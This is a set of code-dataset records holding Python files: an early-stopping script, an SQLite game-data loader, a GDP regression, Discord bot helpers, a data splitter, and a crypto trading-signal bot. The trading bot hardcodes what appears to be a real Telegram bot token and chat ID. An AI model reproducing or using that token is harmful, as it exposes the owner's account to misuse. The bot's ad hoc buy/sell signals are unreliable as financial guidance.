res:\n best_epoch = np.argmin(cur_data[\"monitor_metric\"][:end_epoch])\n best_loss = cur_data[\"monitor_metric\"][best_epoch]\n classifier_stop_res[\"is_stopped\"].append(1)\n classifier_stop_res[\"stop_epoch\"].append(end_epoch - 1)\n break\n else:\n best_epoch = np.argmin(cur_data[\"monitor_metric\"])\n best_loss = cur_data[\"monitor_metric\"][best_epoch]\n classifier_stop_res[\"is_stopped\"].append(0)\n classifier_stop_res[\"stop_epoch\"].append(len(cur_data[\"monitor_metric\"]) - 1)\n classifier_stop_res[\"best_epoch\"].append(best_epoch)\n classifier_stop_res[\"best_loss\"].append(best_loss)\n classifier_stop_res[\"total_time\"].append(total_time)\n classifier_stop_res[\"timer_count\"].append(timer_count)\n # break\n if idx % 50 == 0:\n print(f\"{idx}/{len(training_set.names)}\")\n classifier_stop_res = addInfo(classifier_stop_res)\n tmp = pd.DataFrame.from_dict(classifier_stop_res)\n tmp.to_csv(OUT_PATH / f\"{model_path.stem}_{classifier_window}_{step}.csv\", index=False)\n classifier_stop_res = addInfo(classifier_stop_res)\n classifier_stop_res = pd.DataFrame.from_dict(classifier_stop_res)\n 
classifier_stop_res.to_csv(OUT_PATH / f\"{model_path.stem}_{classifier_window}_{step}.csv\", index=False)\n", "repo_name": "OverfitGuard/OverfitGuard", "sub_path": "classifier_as_stopper.py", "file_name": "classifier_as_stopper.py", "file_ext": "py", "file_size_in_byte": 3727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.perf_counter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "call"}, {"api_name": "core.dataloader.TrainingLogDataset", "line_number": 25, "usage_type": "call"}, {"api_name": "core.dataloader", "line_number": 25, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "core.helper.readPkl", "line_number": 36, "usage_type": "call"}, {"api_name": "core.helper", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "39591765978", "text": "\"\"\"\nCreates a database of games from the Tesera TOP list (without duplicates)\n\"\"\"\n\nimport sqlite3\nimport json\n\nbase = sqlite3.connect(fr'../filters/Tesera_Top5000_1.db')  # create the database\ncur = base.cursor()\n\nwith open(fr'../TopList/Top5000_2.json') as file:\n    games = json.load(file)\nstr_key_list = ', '.join([x for x in games[0].keys()][1:])\n# build a string of key names to use as the table's column names\n\nbase.execute(f'CREATE TABLE IF NOT EXISTS data (id PRIMARY KEY, {str_key_list})')  # create the table columns\n\nfor number, game in enumerate(games):\n    print(number)\n    try:\n        cur.execute(f'INSERT INTO data VALUES({\", \".join(\"?\"*len(game))})', [value for value in game.values()])\n    except Exception as ex:\n        print(ex)\n    # populate the table\nbase.commit()\n", "repo_name": "Vansanych/BGG_Database", "sub_path": "SQL/SQL_Top_Tesera3.py", "file_name": "SQL_Top_Tesera3.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "42607629754", "text": "\"\"\" \n\n    The following program uses non-linear regression to analyze China's GDP over the years 1960-2014.\n    The dataset has two columns: the first contains the year, while the second contains the annual GDP in US $.\n\n\n\"\"\"\n# DEPENDENCIES\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\n# IMPORTING DATASET\n\ndf = pd.read_csv(\"china_gdp.csv\")\n# print(df.head(10))\n\nx_data, y_data = (df[\"Year\"].values, df[\"Value\"].values)\n\n# VISUALIZING THE DATASET TO CHOOSE THE BEST REGRESSION\n\"\"\" \nplt.figure(figsize=(8, 5))\nplt.plot(x_data, y_data, 'ro')\nplt.ylabel('GDP')\nplt.xlabel('Year')\nplt.show() \"\"\"\n\n# The graph closely resembles that of
 a logistic function. Hence it would be best to use logistic regression\n# since the growth is slow in the beginning, then there is rapid growth in the middle, and then it dies out.\n\n\"\"\" \n    The formula for the logistic function is: y = 1 / (1 + e^(-a(X - b))) where\n    a controls the curve's steepness\n    b shifts the curve along the x-axis\n\n\"\"\"\n\n\ndef sigmoid(x, beta_1, beta_2):\n    y = 1/(1+np.exp(-beta_1*(x-beta_2)))\n    return y\n\n\nbeta_1 = 0.1\nbeta_2 = 1990\n\n# EXAMPLE OF A SAMPLE SIGMOID FUNCTION\n\n\"\"\" y_pred = sigmoid(x_data,beta_1,beta_2)\nplt.plot(x_data, y_pred*15000000000000.)\nplt.plot(x_data, y_data, 'ro')\nplt.show() \"\"\"\n\n# NORMALIZATION OF DATA\n\nxdata = x_data/max(x_data)\nydata = y_data/max(y_data)\n\n\n\"\"\" \n    we can use __curve_fit__, which uses non-linear least squares, to fit our sigmoid function to the data.\n    It finds optimal values for the parameters so that the sum of the squared residuals of sigmoid(xdata, *popt) - ydata is minimized.\n\n\"\"\"\npopt, pcov = curve_fit(sigmoid, xdata, ydata)\n# print the final parameters\n# print(\" beta_1 = %f, beta_2 = %f\" % (popt[0], popt[1])) The best parameters are \n\n# TO VISUALIZE THE PLOT \n\n\"\"\" x = np.linspace(1960, 2015, 55)\nx = x/max(x)\nplt.figure(figsize=(8,5))\ny = sigmoid(x, *popt)\nplt.plot(xdata, ydata, 'ro', label='data')\nplt.plot(x,y, linewidth=3.0, label='fit')\nplt.legend(loc='best')\nplt.ylabel('GDP')\nplt.xlabel('Year')\nplt.show() \"\"\"\n\nmsk = np.random.rand(len(df)) < 0.8\ntrain_x = xdata[msk]\ntest_x = xdata[~msk]\ntrain_y = ydata[msk]\ntest_y = ydata[~msk]\n\n# MODEL TRAIN USING THE BEST FIT PARAMETERS\npopt, pcov = curve_fit(sigmoid, train_x, train_y)\n\n# PREDICTION OF TEST SET\ny_predict = sigmoid(test_x, *popt)\n\n# ACCURACY\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(y_predict - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((y_predict - test_y) ** 2))\nfrom sklearn.metrics import r2_score\nprint(\"R2-score: %.2f\" % r2_score(test_y, y_predict) )\n\n# y_predict = sigmoid([2020], *popt)\n# print(y_predict * max(y_data))\n\n\n", "repo_name": "Premjxt-07/China-s-GDP-Analysis", "sub_path": "analysingchinagdp.py", "file_name": "analysingchinagdp.py", "file_ext": "py", "file_size_in_byte": 2724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "71734538753", "text": "import json\nimport sys\nfrom dataclasses import dataclass\nfrom enum import EnumMeta, auto\nfrom logging import DEBUG, Formatter, Logger, StreamHandler, getLogger\nfrom pathlib import Path\nfrom typing import Any, Literal, Optional, TypedDict\n\nfrom discord.ext.commands import Bot\nfrom strenum import LowercaseStrEnum, StrEnum\n\nPlayer = TypedDict(\n    \"Player\",\n    {\n        \"#\": int,\n        
\"name\": str,\n \"mmr\": int,\n \"win\": int,\n \"loss\": int,\n \"rbucks\": int,\n \"rating\": int,\n \"adjusted_mmr\": int,\n \"%\": float,\n \"commends\": int,\n \"reports\": int,\n \"behaviour\": int,\n },\n)\nTeam = tuple[Player, Player, Player, Player, Player]\nTeamCombination = tuple[Team, Team]\n\n# We need a globally accessible reference to the bot instance for event handlers that require Cog functionality.\nbot: Optional[Bot] = None\n\nROOT_DIR: Path = Path(__file__).resolve().parent.parent\n\n\nclass EnumeratorMeta(EnumMeta):\n def __contains__(cls, member: Any) -> bool:\n if type(member) == cls:\n return EnumMeta.__contains__(cls, member)\n else:\n try:\n cls(member)\n except ValueError:\n return False\n return True\n\n\nclass Roles(StrEnum):\n ADMIN: Literal[\"IHL Admin\"] = \"IHL Admin\"\n MEMBER: Literal[\"IHL\"] = \"IHL\"\n\n\nclass Side(LowercaseStrEnum, metaclass=EnumeratorMeta):\n RADIANT = auto()\n DIRE = auto()\n\n\n@dataclass\nclass PlayerTransfer:\n buyer: str\n amount: int\n\n\n@dataclass\nclass Bet:\n side: str\n stake: int\n player: str\n\n\nclass OneHeadException(BaseException):\n pass\n\n\ndef get_bot_instance() -> Bot:\n if bot is None:\n raise OneHeadException(\"Global bot instance is None\")\n\n return bot\n\n\ndef set_bot_instance(new_bot_instance: Bot) -> None:\n global bot\n bot = new_bot_instance\n\n\ndef get_player_names(t1: \"Team\", t2: \"Team\") -> tuple[tuple[str, ...], tuple[str, ...]]:\n \"\"\"\n Obtain player names from player profiles.\n\n :param t1: Player Profiles for Team 1.\n :param t2: Player Profiles for Team 2.\n :return: Names of players on each team.\n \"\"\"\n\n t1_names: tuple[str, ...] = tuple(sorted([x[\"name\"] for x in t1]))\n t2_names: tuple[str, ...] = tuple(sorted([x[\"name\"] for x in t2]))\n\n return t1_names, t2_names\n\n\ndef load_config() -> dict:\n try:\n config_path: Path = Path(ROOT_DIR, \"secrets/config.json\")\n with open(str(config_path), \"r\") as f:\n config: dict = json.load(f)\n except IOError as e:\n raise OneHeadException(e)\n\n return config\n\n\ndef update_config(updated_config: dict) -> None:\n try:\n config_path: Path = Path(ROOT_DIR, \"secrets/config.json\")\n with open(str(config_path), \"w\") as f:\n json.dump(updated_config, f)\n except IOError as e:\n raise OneHeadException(e)\n\n\ndef set_logger() -> Logger:\n handler: StreamHandler = StreamHandler(stream=sys.stdout)\n formatter: Formatter = Formatter(fmt=\"%(asctime)s %(levelname)-8s %(message)s\", datefmt=\"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n log: Logger = getLogger(\"onehead\")\n log.setLevel(DEBUG)\n log.addHandler(handler)\n return log\n\n\nlog: Logger = set_logger()\n\n\ndef get_logger() -> Logger:\n return log\n", "repo_name": "belmegatron/OneHead", "sub_path": "onehead/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TypedDict", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 33, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "name"}, {"api_name": "enum.EnumMeta", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "enum.EnumMeta.__contains__", "line_number": 41, "usage_type": "call"}, {"api_name": "enum.EnumMeta", 
"line_number": 41, "usage_type": "name"}, {"api_name": "strenum.StrEnum", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 52, "usage_type": "name"}, {"api_name": "strenum.LowercaseStrEnum", "line_number": 55, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 56, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 57, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 60, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 66, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 77, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 84, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "name"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 117, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 125, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 125, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 126, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 128, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 129, "usage_type": "argument"}, {"api_name": "logging.Logger", "line_number": 124, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 134, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "39005103873", "text": "import requests\nimport json\nimport datetime\nimport time\nimport telegram\nimport pytz\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\n\ndef get_csv(symbol, start_date,end_date, res):\n\n start_date_stamp = int(time.mktime(datetime.datetime.strptime(start_date,'%Y-%m-%d').timetuple()))\n end_date_stamp = int(time.mktime(datetime.datetime.strptime(f'{end_date} 23:59','%Y-%m-%d %H:%M').timetuple()))\n\n url = f\"https://api.nobitex.ir/market/udf/history?symbol={symbol}&resolution={res}&from={start_date_stamp}&to={end_date_stamp}\"\n\n payload={}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.text\n y = json.loads(res)\n df = pd.DataFrame({'Date':y['t'][::-1],'Close':y['c'][::-1], 'Open':y['o'], 'High':y['h'], 'Low':y['o']})\n df['Date'] = df['Date'].apply(lambda x: datetime.datetime.fromtimestamp(x, tz=pytz.timezone('Asia/Tehran')))\n return df\n\ndef get_csv_datetime(symbol, start_date,end_date, res):\n\n start_date_stamp = int(datetime.datetime.timestamp(start_date) )\n end_date_stamp = int(datetime.datetime.timestamp(end_date))\n\n url = f\"https://api.nobitex.ir/market/udf/history?symbol={symbol}&resolution={res}&from={start_date_stamp}&to={end_date_stamp}\"\n payload={}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.text\n y = json.loads(res)\n df = pd.DataFrame({'Date':y['t'][::-1],'Close':y['c'][::-1], 'Open':y['o'], 'High':y['h'], 'Low':y['o']})\n df['Date'] = df['Date'].apply(lambda x: datetime.datetime.fromtimestamp(x, tz=pytz.timezone('Asia/Tehran')))\n return df\n\n\ndef window_dataframe(df, 
start_date,end_date,num_of_features):\n \n #windowed_df = df[ (start_date <= df['Date']) & (df['Date'] <= end_date)]\n windowed_df = df[['Date','Close']]\n windowed_df = windowed_df.rename({'Close':'target'}, axis=1)\n\n for n in range(num_of_features):\n feature = []\n for index in range(len(windowed_df)):\n if index + num_of_features >= len(windowed_df):\n feature.append(0)\n else:\n feature.append(windowed_df.loc[index+n+1].target)\n windowed_df[f'target-{n+1}'] = feature\n\n windowed_df.drop(windowed_df.tail(num_of_features).index, inplace=True)\n return windowed_df\n\ndef windowed_df_to_date_X_y(windowed_df):\n \n windowed_df = windowed_df.sort_values(by='Date')\n\n df_as_np = windowed_df.to_numpy()\n\n dates = df_as_np[:,0]\n\n X = df_as_np[:,2:]\n\n X = X.reshape((len(dates), X.shape[1],1))\n\n Y = df_as_np[:,1]\n\n return dates, X.astype(np.float32), Y.astype(np.float32)\n\n\n\n\ncryptoes = [\n {'symbol':'TRXIRT'},\n {'symbol':'ADAIRT'},\n {'symbol':'LINKIRT'},\n {'symbol':'EOSIRT'},\n {'symbol':'ETHIRT'},\n {'symbol':'XRPIRT'},\n {'symbol':'DOTIRT'},\n {'symbol':'UNIIRT'},\n {'symbol':'SANDIRT'}\n]\n\n\n\nTELEGRAM_BOT_TOKEN = '5474558689:AAEqdTKZdqLdw10P7BZhlo9lTN89AxJLQv4'\nTELEGRAM_CHAT_ID = '-1001639881360'\n\nbot = telegram.Bot(token=TELEGRAM_BOT_TOKEN)\n\n\n\n\nfor crypto in cryptoes:\n model = load_model(f'models/{crypto[\"symbol\"]}.h5')\n crypto['model'] = model\n\n\n\n# get the start time\nstart_time = datetime.datetime.now(tz=pytz.timezone('Asia/Tehran'))\nstart_time = start_time - datetime.timedelta(hours=1,minutes=30)\n\nDAYS_TO_RUN = 1\n## Consider that we are running this for a day.\nend_time = start_time + datetime.timedelta(days = DAYS_TO_RUN+1)\n\ntimes = 0\n\n\n\nstart_date = '2022-07-27'\nend_date = '2022-08-12'\nfor index, crypto in enumerate(cryptoes):\n m_df = get_csv(crypto['symbol'], start_date, end_date,'60')\n crypto['min'] = m_df.Close.min()\n crypto['max'] = m_df.Close.max()\n print(f'{crypto[\"symbol\"]} : {crypto[\"min\"]} - {crypto[\"max\"]}')\n\n \n\n\nwhile(datetime.datetime.now(tz=pytz.timezone('Asia/Tehran')) < end_time):\n for index, crypto in enumerate(cryptoes):\n #for crypto in cryptoes:\n symbol = crypto['symbol']\n print(symbol)\n ## Getting the data\n now_time = datetime.datetime.now(tz=pytz.timezone('Asia/Tehran'))\n if times == 0:\n new_df = get_csv_datetime(symbol,start_time, now_time ,'5')\n else:\n new_df = get_csv_datetime(symbol,now_time - datetime.timedelta(minutes=11), now_time ,'5')\n # Normalizing the data\n new_df['Date'] = pd.to_datetime(new_df['Date'])\n new_df['Close'] = new_df['Close'].apply(lambda x: str(x).replace(',',''))\n new_df['Close'] = pd.to_numeric(new_df['Close'],errors='coerce')\n min = crypto['min']\n max = crypto['max']\n new_df.Close = (new_df.Close - min) / (max - min)\n\n if len(new_df) < 4:\n\n crypto['df'].loc[-1] = new_df.loc[0]\n crypto['df'].index = crypto['df'].index + 1\n crypto['df'] = crypto['df'].sort_index()\n else:\n crypto['df'] = new_df\n print(new_df)\n ## Windowing the df\n windowed_df = window_dataframe(crypto['df'],'1999-1-1','2090-1-1',4)\n dates, X,y = windowed_df_to_date_X_y(windowed_df)\n crypto['dates'] = dates\n crypto['X'] = X\n crypto['y'] = y\n\n \n fig = plt.figure(figsize=(26,12))\n fig.suptitle(f'{now_time.hour}:{now_time.minute}')\n axes = fig.subplots(nrows=3,ncols=3)\n for index, crypto in enumerate(cryptoes):\n ax = axes[int(index/3)][index%3]\n y_preds = crypto['model'].predict(crypto['X']).flatten()\n idx = np.argwhere(np.diff(np.sign(crypto['y'] - y_preds))).flatten()\n 
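# indices where the actual and predicted curves cross (sign changes); these crossings are treated as buy/sell points below\n        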
#idx = list(map(lambda x:x+1, idx))\n ax.set_title(crypto['symbol'])\n\n min = crypto['min']\n max = crypto['max']\n \n signals = []\n for id in idx:\n price = crypto['y'][id] * (max-min) + min\n time_str = f'{crypto[\"dates\"][id].hour}:{crypto[\"dates\"][id].minute}' \n if id+1 < len(crypto['y']):\n if crypto['y'][id] < y_preds[id]:\n signals.append({'type':'sell','time':time_str, 'price':price,'idx':id})\n elif crypto['y'][id] > y_preds[id]:\n signals.append({'type':'buy','time':time_str, 'price':price,'idx':id})\n else:\n if crypto['y'][id] < crypto['y'][id+1]:\n signals.append({'type':'sell','time':time_str, 'price':price,'idx':id})\n elif crypto['y'][id] > crypto['y'][id+1]:\n signals.append({'type':'buy','time':time_str, 'price':price, 'idx':id})\n \n if times == 0:\n crypto['signals'] = signals\n message = f'lost signals {crypto[\"symbol\"]}: {signals}' \n print(message)\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n else:\n len_new = len(signals) - len(crypto['signals'])\n if len_new > 0:\n new_signals = signals[(-1) * len_new:]\n for signal in new_signals:\n signal['time'] = f'{crypto[\"dates\"][-1].hour}:{crypto[\"dates\"][-1].minute}' \n signal['price'] = crypto['y'][-1] * (max-min) + min\n message = f'new signals {crypto[\"symbol\"]}: {new_signals}'\n print(message)\n ##TODO:: send message telegram\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n crypto['signals'] = signals\n \n\n ax.plot(crypto['dates'], y_preds)\n\n ax.plot(crypto['dates'],crypto['y'])\n sells = [signal['idx']+1 for signal in list(filter(lambda x:x['type'] == 'sell', signals))]\n buys = [signal['idx']+1 for signal in list(filter(lambda x:x['type'] == 'buy', signals))]\n\n ax.plot(dates[sells], crypto['y'][sells], 'ro' )\n ax.plot(dates[buys], crypto['y'][buys], 'go' )\n ax.legend(['Predicted Price','Actual Price','Sell Points','Buy Points'])\n \n fig.savefig('chart-5.jpg')\n bot.send_photo(chat_id=TELEGRAM_CHAT_ID, photo=open('chart-5.jpg', 'rb'))\n\n times+=1\n plt.show()\n print('----------------------------------------------------------------------------------------------------------------------------------------------')\n for crypto in cryptoes:\n print(f'signals {crypto[\"symbol\"]}: {crypto[\"signals\"]}')\n time.sleep(300)\n\n\n\n", "repo_name": "shervindadashzade/Trader-bot", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.mktime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 32, "usage_type": 
"call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.timestamp", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "telegram.Bot", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 119, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 146, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "numpy.argwhere", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "26207603657", "text": "from upath import UPath as Path\nimport logging\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport nbvv\nimport os\nimport warnings\nfrom aicsimageio import transforms, AICSImage\nfrom aicsimageprocessing import diagnostic_sheet, read_ome_zarr, rescale_image, imgtoprojection\n\nfrom serotiny.io.image import image_loader\nfrom cytodata_aics.io_utils import rescale_image\n\nlogging.getLogger(\"bfio\").setLevel(logging.ERROR)\nlogging.getLogger(\"bfio.backends\").setLevel(logging.ERROR)\nlogging.getLogger(\"aicsimageio\").setLevel(logging.ERROR)\n\n\n\n#From Chapter 5\n#loading library, making path for \ndef split_dataframe_(\n dataframe,\n train_frac,\n val_frac,\n seed,\n return_splits = True\n):\n \"\"\"Given a pandas dataframe, perform a train-val-test split and either return three\n 
different dataframes, or append a column identifying the split each row belongs to.\n    TODO: extend this to enable balanced / stratified splitting\n    Parameters\n    ----------\n    dataframe: pd.DataFrame\n        Input dataframe\n    train_frac: float\n        Fraction of data to use for training. Must be <= 1\n    val_frac: Optional[float]\n        Fraction of data to use for validation. By default,\n        the data not used for training is split in half\n        between validation and test\n    return_splits: bool = True\n        Whether to return the three splits separately, or to append\n        a column to the existing dataframe and return the modified\n        dataframe\n    \"\"\"\n\n    # import here to optimize CLIs / Fire usage\n    from sklearn.model_selection import train_test_split\n\n    train_ix, val_test_ix = train_test_split(\n        dataframe.index.tolist(), train_size=train_frac, random_state=seed\n    )\n    if val_frac is not None:\n        val_frac = val_frac / (1 - train_frac)\n    else:\n        # by default use same size for val and test\n        val_frac = 0.5\n\n    val_ix, test_ix = train_test_split(val_test_ix, train_size=val_frac, random_state=seed)\n\n    if return_splits:\n        return dict(\n            train=dataframe.loc[train_ix],\n            valid=dataframe.loc[val_ix],\n            test=dataframe.loc[test_ix],\n        )\n\n    dataframe.loc[train_ix, \"split\"] = \"train\"\n    dataframe.loc[val_ix, \"split\"] = \"valid\"\n    dataframe.loc[test_ix, \"split\"] = \"test\"\n\n    return dataframe\n\ndef split_dataframe_with_seed(df, train_frac, val_frac, seed):\n    Path(\"/home/aicsuser/serotiny_data/\").mkdir(parents=True, exist_ok=True)\n    \n    # Sample n cells per group\n    n = 2000 # number of cells per mitotic class\n    cells_to_include=[]\n    for name, group in df.groupby('cell_stage'):    \n        sampled_group = group.sample(min([n,len(group)]))\n        cells_to_include.append(sampled_group)\n    df_mitocells = pd.concat(cells_to_include).reset_index(drop=True)\n\n    # Discarding all the M6M7_single cells\n    df_mitocells = df_mitocells.drop(df_mitocells[df_mitocells['cell_stage']=='M6M7_single'].index)\n\n    # Add the train, test and validate split\n    df_mitocells = split_dataframe_(dataframe=df_mitocells, train_frac=train_frac, val_frac=val_frac, return_splits=False, seed=seed)\n\n    # df_mitocells.to_csv(\"/home/aicsuser/serotiny_data/mitocells.csv\") \n    print(f\"Number of cells: {len(df_mitocells)}\")\n    print(f\"Number of columns: {len(df_mitocells.columns)}\")\n\n    return df_mitocells\n\n\ndef generate_dataset(train_frac=0.7, val_frac=0.2, seed=42):\n    df = pd.read_parquet(\"s3://allencell-hipsc-cytodata/hackathon_manifest_17oct2022.parquet\")\n    print(f'Number of cells: {len(df)}')\n    print(f'Number of columns: {len(df.columns)}')\n    data_frame = split_dataframe_with_seed(df, train_frac=train_frac, val_frac=val_frac, seed=seed)\n\n    # M0 2000\n    # M1M2 2000\n    # M4M5 2000\n    # M6M7_complete 1198\n    # M3 981\n\n    CLASS_DICT = {\n        \"M0\": 0,\n        \"M1M2\": 1,\n        \"M3\": 2,\n        \"M4M5\": 3,\n        \"M6M7_complete\": 4,\n    }\n    data_frame['cell_stage_code'] = data_frame['cell_stage'].map(CLASS_DICT)\n    print(data_frame['cell_stage_code'].value_counts())\n    return data_frame\n", "repo_name": "pedrofale/cytodata-hackathon-base", "sub_path": "cytodata_aics/split_dataset.py", "file_name": "split_dataset.py", "file_ext": "py", "file_size_in_byte": 4096, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.ERROR",
